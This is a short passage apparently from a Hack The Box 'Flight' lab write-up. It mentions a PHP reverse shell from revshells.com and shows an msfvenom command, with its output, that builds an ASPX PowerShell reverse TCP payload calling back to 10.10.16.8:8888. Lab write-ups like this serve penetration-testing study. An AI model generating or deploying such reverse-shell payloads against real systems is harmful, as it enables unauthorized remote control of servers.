revShells
revshells.com generated a PHP reverse shell
ASPX Reverse Shell
┌──(kali㉿kali)-[~/archive/htb/labs/flight]
└─$ msfvenom -p windows/x64/powershell_reverse_tcp LHOST=10.10.16.8 LPORT=8888 -f aspx -o shell.aspx
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 1885 bytes
Final size of aspx file: 10625 bytes
Saved as: shell.aspx
msfvenom generated an ASPX reverse shell